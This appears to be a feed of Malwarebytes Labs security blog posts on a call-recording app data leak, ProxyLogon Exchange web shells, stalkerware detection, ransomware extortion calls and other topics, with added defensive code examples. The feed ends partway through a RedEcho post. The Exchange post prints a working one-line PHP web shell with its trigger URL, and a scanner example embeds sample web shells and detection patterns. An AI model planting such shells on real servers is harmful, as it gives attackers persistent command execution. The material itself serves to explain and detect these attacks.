IT NEWS

iPhone app exposed other people’s call recordings

Video and audio are huge privacy concerns for people. If something goes wrong with tech it can have major ramifications. You’re likely very familiar with warnings about video. However, audio hasn’t always been so prominent. It’s only really since the rise of home assistants like Amazon’s Alexa that audio worries have gone mainstream.

Turning up the volume on audio threats

Bluetooth earphones and similar devices have only helped to raise awareness of potential issues, as we consider the tools we use the most. As per the link, it’s generally a lot harder to secure sound than vision. There isn’t an audio equivalent of the bit of tape over your webcam. You’re dealing with the innards of your device and that’s not for everyone. Either the hardware tinkering is beyond them, or their audio setup is a confusing mess of six audio devices and brand-specific audio controls.

It isn’t easy, and that’s just for desktop. Mobile is another proposition altogether, being an incredibly personal device yet something of a mystery-box to many owners. How does your Android phone work? Which version of Android is it even? How do the basic settings differ on your phone from mine? You’re giving me an iPhone for work? Sorry, I’ve never used one of those before.

These are just a sample selection of the things you’ll run into if you’ve ever been nominated your household’s Christmas season tech support. Worse, a lot of what seems to happen on a phone actually happens in the cloud (such as interpreting voice commands), where it’s completely beyond your reach.

Which brings us neatly to a recent discovery.

Listening in to someone else’s recordings

Researchers found an issue with an iPhone call recording app that boasts of “more than 1,000,000 downloads”. It records calls and lets users share the clips via email, or save them to storage services such as Dropbox and Google Drive, so it offers a fair bit of flexibility for people in need of some audio recording.

The researcher who discovered the vulnerability used various security testing tools to view and modify the network traffic generated by the app. From there, they discovered it was possible to replace their own phone number with someone else’s. With that done, the recordings for that other phone (stored in the cloud, in an Amazon AWS bucket) were available to them, without a password. The entire call history, including the numbers the calls were made to and from, was also available, at least until the app was updated and the problem fixed by the developers.

Or, as the researchers at PingSafe put it:

The vulnerability allowed any malicious actor to listen to any user’s call recording from the cloud storage bucket of the application and an unauthenticated API endpoint which leaked the cloud storage URL of the victim’s data

Considering the kind of recordings people could make, this is a worrying thing to have happened. Think of all the business sensitive conversations people might have, or personal discussions, random thoughts, or anything else. Yes, we can argue people shouldn’t upload mission critical work conversations into the cloud (or even a laundry list of complaints about their neighbour). However, if you give people a recording app then record they will.
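The two design mistakes described above (an endpoint that trusts a caller-supplied phone number, and permanent, unauthenticated bucket URLs) are easy to see side by side in code. The following is an added illustration written for this digest, not the app’s own code: the first handler reproduces the flawed pattern, the second takes identity from the authenticated session and hands out short-lived signed URLs that the storage layer verifies. The phone numbers, bucket name, signing key and session table are all constructed for the example.

```python
import hashlib
import hmac
import time
from urllib.parse import parse_qs, urlparse

SIGNING_KEY = b"constructed-signing-key-not-for-production"  # constructed for this example
BUCKET = "example-recordings-bucket"                          # constructed bucket name

# Constructed data store: phone number -> object keys of that number's recordings.
RECORDINGS = {
    "+15550100001": ["+15550100001/2021-03-01.m4a"],
    "+15550100002": ["+15550100002/2021-03-02.m4a", "+15550100002/2021-03-03.m4a"],
}

# Constructed session table: bearer token -> phone number it was issued for.
SESSIONS = {"tok-alice": "+15550100001"}


def vulnerable_lookup(params):
    """Flawed design: trusts the caller-supplied phone number and returns
    permanent, unauthenticated bucket URLs. Anyone who changes the number
    gets someone else's recordings."""
    number = params.get("phone", "")
    return [f"https://{BUCKET}.example/{key}" for key in RECORDINGS.get(number, [])]


def _signature(key, expires):
    msg = f"{key}|{expires}".encode()
    return hmac.new(SIGNING_KEY, msg, hashlib.sha256).hexdigest()


def sign_url(key, expires):
    """Build a URL the storage layer will honour only until `expires`
    (a Unix timestamp) and only for exactly this object key."""
    return f"https://{BUCKET}.example/{key}?expires={expires}&sig={_signature(key, expires)}"


def verify_signed_url(url, now):
    """Storage-side check: reject expired links and any tampering with the
    object key, the expiry or the signature."""
    parsed = urlparse(url)
    qs = parse_qs(parsed.query)
    try:
        expires = int(qs.get("expires", ["0"])[0])
    except ValueError:
        return False
    sig = qs.get("sig", [""])[0]
    key = parsed.path.lstrip("/")
    return now < expires and hmac.compare_digest(sig, _signature(key, expires))


def hardened_lookup(params, headers, now=None, ttl=300):
    """Identity comes from the authenticated session, never from the request,
    and the result is a short-lived signed URL rather than a permanent path."""
    auth = headers.get("Authorization", "")
    token = auth[len("Bearer "):] if auth.startswith("Bearer ") else ""
    number = SESSIONS.get(token)
    if number is None:
        raise PermissionError("authentication required")
    # params["phone"] is deliberately ignored: a caller may only list the
    # recordings for the number their own session was issued for.
    now = int(time.time()) if now is None else now
    return [sign_url(key, now + ttl) for key in RECORDINGS.get(number, [])]


if __name__ == "__main__":
    print("vulnerable:", vulnerable_lookup({"phone": "+15550100002"}))
    print("hardened:", hardened_lookup({"phone": "+15550100002"},
                                       {"Authorization": "Bearer tok-alice"}))
```

Note that the hardened handler still accepts a `phone` parameter and silently ignores it; that is the point. Authorization is derived from who the session belongs to, so a changed parameter cannot widen what the caller can see, and even a leaked URL stops working after five minutes.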

The perils of audio data in the cloud

TechCrunch reports there were 130,000+ audio recordings, weighing in at some 300GB in size, in the storage bucket. That’s a lot of potential for mischief, pranks, trolling, or just plain old blackmail and extortion. If we’re lucky, the only person who noticed this was the researcher who reported it.

Audio has always been a source for security and privacy concerns. Whether we’re talking fake Twitch audio fixes or where people’s data ends up, it’s always worth keeping in mind.

It might not be as visible a concern as the usual security hot-spots on your laptops and mobile devices, or as obvious as video. All the same, it’s an important part of your overall security hygiene.

This is probably an excellent moment to check:

  • whether your audio software needs updating
  • that your streaming accounts are secure
  • that you’re happy with any audio files kept in the cloud

Follow these steps and hopefully your audio security will soon catch up with your visual-based best practices.

The post iPhone app exposed other people’s call recordings appeared first on Malwarebytes Labs.

Microsoft Exchange attacks cause panic as criminals go shell collecting

Only last week we posted a blog about multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Since the disclosure came with a patch already available, under normal circumstances you would expect some companies to update quickly and others to dally until it bubbled up to the top of their to-do list.

This attack method, called ProxyLogon and attributed to a group called Hafnium, was different. It went from “limited and targeted attacks” to a full-size panic in no time. Attackers are using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.

How did this situation evolve? A timeline

To demonstrate how this situation came about we want to show you this timeline of developments:

  • December 2020: CVE-2021-26855 is discovered by DEVCORE, who named the vulnerability ProxyLogon.
  • January 2021: DEVCORE sends an advisory and exploit to Microsoft through the MSRC portal.
  • January 2021: Volexity and Dubex start to see exploitation of Exchange vulnerabilities.
  • January 27, 2021: Dubex shares its findings with Microsoft.
  • February 2, 2021: Volexity informs Microsoft of its findings.
  • March 2, 2021: Microsoft publishes a patch and advisory, which has been updated a few times since then.
  • March 4, 2021: the Cybersecurity and Infrastructure Security Agency (CISA) issues an emergency directive after CISA partners observe active exploitation of vulnerabilities in Microsoft Exchange on-premises products.
  • March 5, 2021: Microsoft and many security vendors see increased use of these vulnerabilities in attacks targeting unpatched systems, by multiple malicious actors, not just Hafnium.
  • March 8, 2021: CISA issues a warning that it is aware of widespread domestic and international exploitation of these vulnerabilities.

The attacks went from a limited Advanced Persistent Threat (APT) used against targeted victims to cryptomining operations run by “common” cybercriminals in no time flat.

What often happens after vulnerabilities get disclosed and patched is that criminals reverse engineer the fix to create their own copycat exploits, so they can attack while systems are still unpatched. Sometimes it takes a lot of skill and perseverance to get a vulnerability to work for you, but judging by how rapidly these Exchange exploits entered the threat landscape, this one looks like a piece of cake.

Victims

As of 8 March, Malwarebytes had detected malicious web shells on close to 1,000 unique machines already. Although most of the recorded attacks have occurred in the United States, organizations in other countries are under attack as well.

Figure: Instances found of Backdoor.Hafnium (web shells detected worldwide)

Chris Krebs, the former director of CISA, reckons government agencies and small businesses will be more affected by these attacks than large enterprises, since enterprises tend to use something other than on-premises Exchange servers.

Figure: Distribution of Backdoor.Hafnium detections by country, as of 8 March, 2021

But Brian Krebs, in a post on his site, states that the Hafnium hackers have accelerated attacks on vulnerable Exchange servers since Microsoft released the patches. His sources told him that 30,000 organizations in the US have been hacked as part of this campaign.

Web shells

A web shell is a malicious script that allows an attacker to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)

Web shells don’t attack or exploit a remote vulnerability; they are always the second step of an attack. Even though a web shell opens the door to further exploitation, it is itself always dropped after an initial exploitation.

Web shell scripts can be written in any of the programming languages designed for use on the web. You will find PHP, ASP, Perl, and many others. Attackers who successfully use web shells take advantage of the fact that many organizations do not have complete visibility into the HTTP sessions on their servers. And most web shells are script files rather than compiled executables, which can make it hard for traditional antivirus software to detect them. The tiniest web shell in PHP on record is only this big:

<?=`$_GET[1]`?>

A shell like this will simply execute whatever command an attacker sends to the compromised server. They run it by calling the script in their browser, or from a command line HTTP client. For example, the following URL would cause a tiny web shell running on example.com to execute whatever replaces {command}:

www.example.com/index.html?1={command}

As you can see the use of this type of backdoor is easy. Once you have planted the web shell, you can use it to create additional web shells or steal information from the server.
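Because web shells are ordinary script files in the web root, one practical defensive check is to scan that web root for the constructs they rely on: request input fed straight into backtick execution, eval, or a shell function, the eval(base64_decode(...)) idiom, and the ASP eval(Request...) equivalent. The scanner below is an added example written for this digest, not Malwarebytes’ or Microsoft’s tooling; it writes a handful of constructed sample files (including the one-liner quoted above) to a temporary directory and reports which rules fire. The optional hash list lets you add SHA-256 values from a vendor’s published IOCs; the set here is empty because none are on this page.

```python
import hashlib
import os
import re
import tempfile

# Constructed stand-in for a web root. Only tiny.php, cmd.php and helper.aspx
# are shells; index.php is benign and readme.txt is not a script at all.
SAMPLE_FILES = {
    "index.php": "<?php echo 'hello'; ?>",
    "tiny.php": "<?=`$_GET[1]`?>",
    "cmd.php": "<?php eval(base64_decode($_POST['x'])); ?>",
    "helper.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["a"],"unsafe");%>',
    "readme.txt": "eval(Request) is mentioned here, but this is documentation, not code",
}

SCRIPT_EXTENSIONS = {".php", ".phtml", ".php5", ".asp", ".aspx", ".ashx", ".jsp", ".jspx"}

REQUEST_VARS = r"\$_(GET|POST|REQUEST|COOKIE)"
PATTERNS = [
    ("backtick-exec-of-request", re.compile(r"`[^`]*" + REQUEST_VARS)),
    ("eval-of-request", re.compile(r"\b(eval|assert)\s*\(.*" + REQUEST_VARS, re.S)),
    ("shell-function-of-request",
     re.compile(r"\b(system|exec|passthru|shell_exec|popen|proc_open)\s*\(.*" + REQUEST_VARS, re.S)),
    ("eval-of-base64", re.compile(r"\beval\s*\(\s*base64_decode", re.S)),
    ("asp-eval-of-request", re.compile(r"\beval\s*\(\s*Request\b", re.S)),
]


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_file(path, known_bad_hashes=frozenset()):
    """Return the names of the rules that fired for one file (empty if clean)."""
    hits = []
    if sha256_of(path) in known_bad_hashes:
        hits.append("known-ioc-hash")
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        text = f.read()
    for name, pattern in PATTERNS:
        if pattern.search(text):
            hits.append(name)
    return hits


def scan_web_root(root, known_bad_hashes=frozenset()):
    """Walk a web root and return {relative path: [rules fired]} for every
    script file that matched at least one rule."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path, known_bad_hashes)
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def demo():
    """Write the constructed files to a temporary directory and scan them."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLE_FILES.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as f:
                f.write(body)
        return scan_web_root(root)


if __name__ == "__main__":
    for path, rules in sorted(demo().items()):
        print(f"{path}: {', '.join(rules)}")
```

Pattern matching like this is a triage aid, not a verdict: an obfuscated shell that builds its function names at runtime will not match, and a legitimate admin script can. Treat a hit as a file to review, and pair the scan with file-modification times and web server access logs to see when the file arrived and which requests have reached it.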

What can we do?

Patch as soon as you can.

Microsoft’s team has published a script on GitHub that can check the security status of Exchange servers. The script has been updated to include indicators of compromise (IOCs) linked to the four zero-day vulnerabilities found in Microsoft Exchange Server.

It was important to patch last week, when it was just targeted attacks, but it’s all the more urgent now that it’s the wild west out there. If you can’t patch your Exchange server, block internet access to it, or restrict access to it by blocking untrusted connections or putting the server behind your VPN.

Scan your server for the presence of malicious web shells. Security vendors have added detection for the publicly posted IOCs and some will detect other malicious web shells as well.

Malwarebytes’ generic detection name for malicious web shells is Backdoor.WebShell and the detection name for the web shells that are tied directly to the Hafnium group is Backdoor.Hafnium.

Figure: Malwarebytes (Nebula) detecting Backdoor.Hafnium

Stay safe, everyone!

The post Microsoft Exchange attacks cause panic as criminals go shell collecting appeared first on Malwarebytes Labs.

TinyCheck: Stalkerware detection that doesn’t leave a trace

In 2019, when Malwarebytes helped found the Coalition Against Stalkerware, which brings together cybersecurity vendors and nonprofits to detect and raise awareness about stalkerware, we encountered a significant roadblock in our fight: For some users, the very detection of these potentially privacy-invasive tools could put their lives at greater risk.

In short, we needed a way to detect stalkerware-type apps without the detection being discoverable by stalkerware-type apps or their users.

Now, a new tool makes that far more possible.

Developed by a small team at Kaspersky, “TinyCheck” represents the latest technological effort from a Coalition Against Stalkerware member to continue the fight against a digital threat that can rob people of their expectation of, and right to, privacy. It is just one of the many advancements from the Coalition Against Stalkerware, which meets routinely to discuss ongoing research, new member applications, regional outreach, and advances in detections.

What is TinyCheck?

TinyCheck is an open-source tool available on GitHub that requires a higher technical skillset than downloading and running any of the apps made by the Coalition Against Stalkerware’s cybersecurity vendors. Those apps, like Malwarebytes for Android, are installed directly on a device where they can perform malware scans to detect and remove suspicious or dangerous programs.

TinyCheck, on the other hand, runs separately from the smartphone, on a computer such as a Raspberry Pi. Functionally, TinyCheck is configured to act as a WiFi access point. Once set up and connected to a smartphone, TinyCheck will analyze that smartphone’s Internet traffic and determine whether it is sending data to a known malicious server.

Kristina Shingareva, head of external relations for Kaspersky, said that TinyCheck “was built with the idea of making it impossible to identify its use via a stalkerware app.”

“The analysis of the checked device is only available to the individual person using TinyCheck with their own equipment,” Shingareva said. “It is not shared anywhere: neither Kaspersky nor any other party will receive this data.”

Further, Shingareva said that TinyCheck analyses are performed locally, and the data from those analyses, including full packet capture, logs, and a PDF report, can only end up on a USB stick that users can plug in to save records, or on a computer, if TinyCheck is running in a browser from a remote workstation.

This may sound like a lot of technical fuss for the everyday user, but the value is tremendous. When used correctly, TinyCheck can overcome what we are calling the “stalkerware detection dilemma.”
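The core of the approach described above is simple to state: sit between the phone and the Internet, record where the phone’s traffic goes, and compare each destination against a list of known bad hosts and networks. The snippet below is an added example written for this digest, not TinyCheck’s code, showing that comparison over a constructed traffic summary. Indicator names use reserved example domains and TEST-NET address ranges; a real deployment would load a maintained IOC feed instead. Note the domain match respects label boundaries, so a lookalike such as notstalker-c2.example is not flagged by the stalker-c2.example indicator.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass
class Connection:
    ts: str         # when the flow started
    dst_host: str   # hostname from DNS or TLS SNI if observed, "" otherwise
    dst_ip: str
    dst_port: int
    bytes_out: int  # bytes the phone sent; large values suggest uploads


# Constructed indicator list (reserved example names and TEST-NET ranges).
INDICATORS = {
    "domains": {"stalker-c2.example", "collector.badvendor.example"},
    "networks": {"203.0.113.0/24"},
}

# Constructed traffic summary from a phone connected to the access point.
SAMPLE_TRAFFIC = [
    Connection("2021-03-08T09:00:01", "api.example.org", "198.51.100.5", 443, 1200),
    Connection("2021-03-08T09:00:07", "upload.stalker-c2.example", "192.0.2.44", 443, 88000),
    Connection("2021-03-08T09:00:09", "", "203.0.113.7", 8080, 5400),
    Connection("2021-03-08T09:00:15", "notstalker-c2.example", "198.51.100.9", 443, 300),
    Connection("2021-03-08T09:00:20", "cdn.example.org", "198.51.100.12", 443, 50000),
]


def compile_indicators(indicators):
    """Normalise domains and parse networks once, before scanning."""
    return {
        "domains": {d.lower().rstrip(".") for d in indicators["domains"]},
        "networks": [ip_network(n) for n in indicators["networks"]],
    }


def match_indicators(conn, compiled):
    """Return the reasons a single connection matched, or [] if it is clean."""
    reasons = []
    host = conn.dst_host.lower().rstrip(".")
    for d in compiled["domains"]:
        # exact match or a subdomain; "." + d prevents suffix lookalikes
        if host and (host == d or host.endswith("." + d)):
            reasons.append(f"domain matches {d}")
            break
    if conn.dst_ip:
        addr = ip_address(conn.dst_ip)
        for net in compiled["networks"]:
            if addr in net:
                reasons.append(f"ip in {net}")
                break
    return reasons


def analyze(connections, indicators=INDICATORS):
    """Return [(connection, reasons)] for every flow that hit an indicator."""
    compiled = compile_indicators(indicators)
    return [(c, match_indicators(c, compiled)) for c in connections
            if match_indicators(c, compiled)]


def report(alerts):
    """Flatten alerts into plain dicts suitable for a PDF or JSON report."""
    return [{"ts": c.ts, "destination": c.dst_host or c.dst_ip, "port": c.dst_port,
             "bytes_out": c.bytes_out, "reasons": reasons} for c, reasons in alerts]


if __name__ == "__main__":
    for row in report(analyze(SAMPLE_TRAFFIC)):
        print(row)
```

Everything here runs on the device doing the capture and the output is a list the operator can save locally, which is what keeps the check invisible to software on the phone: nothing is installed there, no scan runs there, and no notification is generated there.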

The stalkerware detection dilemma

For years, the detection of stalkerware-type apps followed the same model: If a user thought they had a malicious app on their phone, they downloaded a separate, anti-malware app to find that malicious app and then potentially root it out.

This makes sense, as early stalkerware detection fell somewhat haphazardly to the individual cybersecurity vendors that were already protecting people’s computers from other cyberthreats, such as malware, ransomware, and Trojans.

But as effective as that cyberthreat detection model is, it makes a lot of assumptions about its users. First, it assumes that users have full agency over their computers and devices, and are able to download a separate program on their own and then run that program with little interference. Second, it assumes that the removal of a cyberthreat is the best way to keep a user safe.

In reality, those assumptions could be dangerous when dealing with stalkerware.

As we have written about on Malwarebytes Labs, there is a documented intersection between stalkerware use and domestic abuse. Domestic abusers have repeatedly used these tools to invade the privacy of their partners’ lives, prying into their text messages and emails, revealing their web browsing history, pinpointing their GPS location, and secretly recording their phone calls.

For many domestic abusers, stalkerware can serve as a digital method to maintain control of their partner’s life. For the survivor, then, the removal of a stalkerware-type app can actually cause more harm, cutting off their abuser’s control and only enraging them. Further, many domestic abuse survivors simply do not have sufficient device control to download and run an anti-malware application on their phone. Their phones may be shared with their abusers, or their phone’s passcode may be required to be shared, or their abuser may not even allow them to have a passcode on their phone at all.

Finally, some stalkerware-type apps can also see a device’s most recently installed app, the device’s screen when active, and the notifications delivered to the device, which could in turn reveal that a survivor downloaded an anti-malware scanner, used the scanner, and then received a notification about a stalkerware-type app present on the device.

Here, then, is the stalkerware detection dilemma: How can we safely detect these threats when the detections themselves could lead to more harm?

It is a question that many members of the Coalition Against Stalkerware have asked, and shortly after the Coalition welcomed Centre Hubertine Auclert as an associate partner, the French organization began working with Kaspersky to find a solution. Inspired by the opportunity, Kaspersky researcher Félix Aimé charged ahead, eventually releasing the first version of TinyCheck last year.

It has since gained new features and seen promising adoption.

Big impact

Though TinyCheck has a higher technical bar for use, it can help address an important gap.

According to Shingareva, Kaspersky relied on several of its experts to run a workshop in January that invited individuals from 15 French associations working to prevent and protect people from domestic abuse. Shingareva said that the company is also supporting TinyCheck in Australia, where it will launch a pilot phase of testing with the network committed to women’s domestic and family violence services, WESNET.

So far, TinyCheck has also been “starred” by more than 1,700 users on GitHub, and the introductory video to TinyCheck on YouTube has obtained more than 4,600 views.

Recently, Kaspersky’s developers updated TinyCheck to be able to send notifications to users when new updates are available. The company is also adding new languages to the user interface, with current functionality available in English, French, Spanish, and Catalan.

Shingareva said it is important that advocate networks and non-governmental organizations committed to protecting survivors of domestic abuse are heavily involved in the further development of TinyCheck. With yet another tool to help fight against stalkerware threats, we are hopeful for the future.

The post TinyCheck: Stalkerware detection that doesn’t leave a trace appeared first on Malwarebytes Labs.

REvil ransomware’s calling, and it’s not good news

The REvil ransomware (AKA Sodinokibi, which operates as a Ransomware as a Service) is adopting some outreach techniques after initial compromise, designed to shame victims into paying up.

Shaming victims into action

Malware authors and social engineers have relied on shame and the threat of exposure for years. Nothing encourages potential victims to pay up like a solid threat. This isn’t something to underestimate or dismiss. It can have very serious consequences, with at least one tragedy involving a suicide linked to common-or-garden ransomware threats. 

These threats are most closely linked to people at home, with sextortion being one of the biggest.

This is where victims are told someone has footage of them watching pornographic material, or engaging in sexual activity. If they don’t pay the Bitcoin ransom, scammers will release the footage to the world at large, or even just to friends and family. The threat is usually accompanied by an old password taken from a password dump—one that has probably long since been changed—which lends it some apparent credibility. The scammers have no footage whatsoever, but it’s a very effective tactic.

From consumer to corporate…

In recent developments, ransomware bought itself a business suit and a nice tie, and it started working its way into corporate. Here, the gimmick was compromising the network, locking up important files and/or servers and demanding cash to release them back to victims.

This quickly became a mess of arguments over paying the ransom, and the world of cyber insurance and whether it would actually insure against these types of attacks. It also led into the concept of ransomware authors ruining their own trust model with broken unlocks or missing decryption keys.

This time it’s personal

Typical ransomware attacks involve the encryption of all available files. More recently, attackers have added data exfiltration to their box of tricks, along with threats to leak the stolen data if victims manage to recover from the encryption without the attacker’s help.

A well-worn security notion is that we never know the full story in terms of numbers compromised by attack X or Y. This seems a reasonable assumption; lots of consumer and business victims of cybercrime do not want to publicize it. There may be liability issues they’re trying to keep hidden, or perhaps they don’t want the embarrassment of everyone knowing what happened.

This latest development twists the exfiltration knife a bit harder by using a splash of shame to encourage victims to pay up.

The scammers perform outreach to the media and the victim’s clients. The idea here is to keep heaping pressure on the victims until they relent and pay up. VoIP calls seem to be the method of choice for said outreach, which helps keep callers anonymized.

As noted by Bleeping Computer, similar tactics have been used in the past, but those calls focused on the victims. Threatening to expose a compromised machine or network via journalists or business affiliates is upping the stakes quite a bit.

As with ransomware attacks where there is no guarantee of being given a decryption key after payment, so too is there no guarantee the attackers will play nice afterwards. Regardless of tactics used, the end results are always the same: pay up, or else.

Putting scammers on the do-not-call list

Options may be limited depending on how prepared victims are at the start of a ransomware attack. It may well be that files are unrecoverable, or business operations cease while cleanup takes place.

It could be that a huge payout is handed to the attackers, and no files are returned. Or they may get lucky, with all services restored and no mention outside the four walls of the business affected. It’s simply a lottery, though having said that, there are a few ways you can even the odds. Stay safe out there, and hopefully you’ll never have to hear a ransomware fan at the other end of a telephone line.

The post REvil ransomware’s calling, and it’s not good news appeared first on Malwarebytes Labs.

A week in security (March 1 – 7)

Last week on Malwarebytes Labs, our podcast featured Eva Galperin who talked to us about defending online anonymity and speech.

We wrote about how Ryuk ransomware has developed a worm-like capability, how Exchange servers are attacked by Hafnium zero-days, 21 million free VPN users’ data was exposed, how China’s RedEcho was accused of targeting India’s power grids, whether Google’s Privacy Sandbox will take the bite out of tracking cookies, and how a Chrome fix patches an in-the-wild zero-day.

Other cybersecurity news

  • Gab has been badly hacked; the stolen information includes what appears to be passwords and private communications. (Source: Wired)
  • A bug in a shared SDK can let attackers join calls undetected across multiple apps. (Source: ZDNet)
  • Business email compromise (BEC) scammers are utilizing a new type of attack targeting investors. (Source: BleepingComputer)
  • Socially engineered attacks surfaced in maritime cybersecurity. (Source: Center for International Maritime Security)
  • Researchers found three new malware strains used by the SolarWinds group. (Source: The Hacker News)
  • Horticulture is an interesting sector for hackers since it is at the forefront of modern technologies. (Source: Horti Daily)
  • A federal judge has approved a $650m settlement of a privacy lawsuit against Facebook for allegedly using photo face-tagging and other biometric data without the permission of its users. (Source: The Guardian)
  • Google shared a PoC exploit for a critical Windows 10 Graphics RCE bug. (Source: Bleeping Computer)

Stay safe, everyone!

The post A week in security (March 1 – 7) appeared first on Malwarebytes Labs.

International Women’s Day: Women in tech name their heroes

Happy Monday! And if you haven’t yet checked the significance of this day—March 8—before grabbing coffee, today is International Women’s Day (IWD).

Since March 19, 1911, the year the very first IWD was observed in several European countries, millions of people have been calling for women to be given more rights, which includes the right to work, vote, and hold public office. A few years later it was moved to March 8 and it has been celebrated on that day ever since.

The United Nations first celebrated IWD in 1975, and two years later proclaimed a United Nations Day for Women’s Rights and International Peace to be observed by member states.

Today, people around the world are celebrating the cultural, economic, political, and social achievements of women. And strong female influences help create equally strong women. Here at Malwarebytes, we didn’t have to look very far for examples. With piqued curiosity, we asked a selection of women who their heroes are. Here are their answers.

RBG

My hero is Ruth Bader Ginsburg. Her entire journey is so inspiring; she led the way for so many women as a role model. She spoke up when it wasn’t entirely ok for women to speak up, she created a path for women to become professionals in the corporate world, and became the second female on the Supreme Court.

Ruth fought for what was right, gender equality, women’s rights and was a big proponent of making sure that every woman has their voice heard. She pushed through many challenges, overcame so many obstacles and was the voice that was needed to help push gender equality forward. It isn’t often that someone is so brave and stands up for what is right in the face of so much adversity.

— Jamie Hudson, Vice President, Global Support & Services


Amanda Palmer

I’d like to talk about my female hero, the artist Amanda Palmer. Whereas I would’ve liked her in my 20s for her daring style and cool music, I admire her now for using her platform to further empower women, to really understand and celebrate their worth. Her book and Ted Talk “The Art of Asking” taught me about the importance of community and kindness, and how we should overcome this fear of asking each other for help, as we are stronger together.

I had the pleasure of meeting her last year, and was blown away by her kindness and love. The meeting left me with a sense of empowerment and determination to keep paying it forward, to keep lifting other women (and with that, myself) up.

— Tjitske dV, Community Relations Manager


Charlotte Klein (and others)

A few of my famous heroes are Tina Fey, Amy Poehler, and Joan Didion. They’ve each blazed pioneering trails in comedy, writing, and journalism, advancing the embrace of female leadership in these previously male-dominated industries. They’ve created iconic characters and captivating stories that have made a tremendous impact on society. Their wit, bravery, and pure talent are an inspiration.

And a real-life hero is the dearly-departed, legendary Charlotte Klein. She was the director of the nationally renowned Charlotte Klein Dance Centers where I studied for 10 years. She was tough as nails (hers were always perfectly manicured), expecting excellence from her students, but offering unrelenting support in return. She gave me the backbone, skills, self-confidence, and heart I needed to succeed in my goals—and they were (are) lofty ones!

— Wendy Zamora, former editor-in-chief, Malwarebytes Labs; current tech/security writer

The post International Women’s Day: Women in tech name their heroes appeared first on Malwarebytes Labs.

Will Google’s Privacy Sandbox take the bite out of tracking cookies?

Third-party cookies have been the lynchpin of online advertising for many years. Plans to phase cookies out forever continue to run at a steady pace, with Google in the driving seat. In 2019, it announced its vision for a “Privacy Sandbox”. The building blocks for this were essentially:

  1. Most aspects of the web need money to survive, and advertising that relies on cookies is the dominant revenue stream.
  2. Blocking ads or cookies can prevent advertisers from generating revenue, threatening #1.
  3. If you block easily controllable methods like cookies, advertisers may turn to other techniques, like fingerprinting, that are harder for users to control.

The Privacy Sandbox mission is to “Create a thriving web ecosystem that is respectful of users and private by default”. The intention is to create a set of rules that will work well for everybody. No third-party cookies, no incredibly specific individual marketing profiles, and data is kept on your device as much as possible. User data is anonymised and grouped into “cohorts”, and those cohorts with similar interests will then see targeted ads. In this way, users aren’t compromising privacy and advertisers can still deliver targeted ads, but will struggle to map out individual identities.

Broadening the scope of user privacy

This all sounds reasonable enough. A push for standards where user data sharing is greatly reduced, but ads can still function as intended is likely much better than what we have now. The wheels often come off on long-term plans like this, so it is to their credit it’s still very much happening.

You can see some aspects of web control already offered by Google in this blog from 2019:

  • My Activity: Look at searches, websites visited, videos watched. It’s sort of like your browser history, but on a grand Google scale, with options to disable aspects of search or location.
  • Ad Settings: Possibly the most relevant to this subject, as it shows how your ads are personalised. This is done via data you’ve added, Google’s best guesses, and data from advertisers partnered with Google. My standout highlight was the assumption I’m into extreme sports, flower arranging, and country music. I guess I’m obscuring my actual interests in a very privacy conscious fashion.

They also explain at length why you see specific ads, and also how to opt out.

Slow and steady wins the race?

Tackling third-party cookies isn’t a particularly new idea, and both Safari and Firefox have been bringing the hammer down, to various degrees of severity. But the companies behind those browsers don’t depend on ad revenue in the way that Google does. Which is why what Google is attempting is not a straightforward ban; it’s trying to find ways to replace the old system entirely. There are many, many arguments about this subject. Some advertisers claim organisations are doing this to keep users behind their own walled garden of advertising and tracking. Others say whatever you replace the old system with, will either be ignored or worked around.

This last point has some validity to it. While the major advertising players will probably work with the new methods, this leaves a gap in the market for shenanigans. Not everybody will play nice. Many smaller networks are entirely reliant on individual tracking. In some cases, they may not be able to adapt—or might not want to.

Tearing up the rulebook

CNAME cloaking, where analytics firms make third-party cookies look like first-party cookies to get around ad-blocking, has been in the news recently. We can expect a lot more of these tactics as the inevitable demise of third-party cookies draws closer.

Much is still unknown about the proposed replacements too. We don’t know exactly how people might extract themselves from specific cohorts should they feel the need to, for example. Or even if it will be possible. If I see targeted, extreme-sport-flower-arranging ads all over the place, what options are available to “fix” it?

These are good questions to ponder while Privacy Sandbox continues its two-year plan to bring the curtain down on the ubiquitous third-party cookie. We look forward to seeing what comes next, and cast a cautious eye in the direction of ad networks everywhere.

The post Will Google’s Privacy Sandbox take the bite out of tracking cookies? appeared first on Malwarebytes Labs.

China’s RedEcho accused of targeting India’s power grids

RedEcho, an advanced persistent threat (APT) group from China, has attempted to infiltrate the systems behind India’s power grids, according to a threat analysis report from Recorded Future [PDF].

It appears that what triggered this attempt to gain a foothold in India’s critical power generation and transmission infrastructure was a tense standoff at Pangong Tso lake in May 2020. However, the report by Recorded Future, a cybersecurity company specializing in threat intelligence, claims that RedEcho was on the prowl well before that.

Incidents at the border

China and India have been locked in a territorial dispute for decades, over an ill-defined, disputed border between Ladakh and Aksai Chin. This de facto boundary, called the Line of Actual Control (LAC), sits in the Himalayan region. Because of snowcaps, rivers, and lakes along the frontier, the LAC can shift, and soldiers from both sides often find themselves face to face with each other, increasing the risk of a confrontation.

The most recent conflict at the border transpired in June 2020, barely a full month after the May skirmish. This time, Chinese and Indian soldiers clashed in Galwan, with China accusing India of crossing onto the Chinese side. A total of 63 casualties—20 troops from India and 43 from China—were reported. Both countries insisted that no bullets were exchanged. Instead, they engaged using, literally, sticks and stones (“rocks and clubs”, according to the BBC).

Incidents in cyberspace

Although Recorded Future had observed a lot of intrusion activity towards Indian organizations in the digital space before the clash, it gained momentum after the Indian and Chinese troops faced off in May.

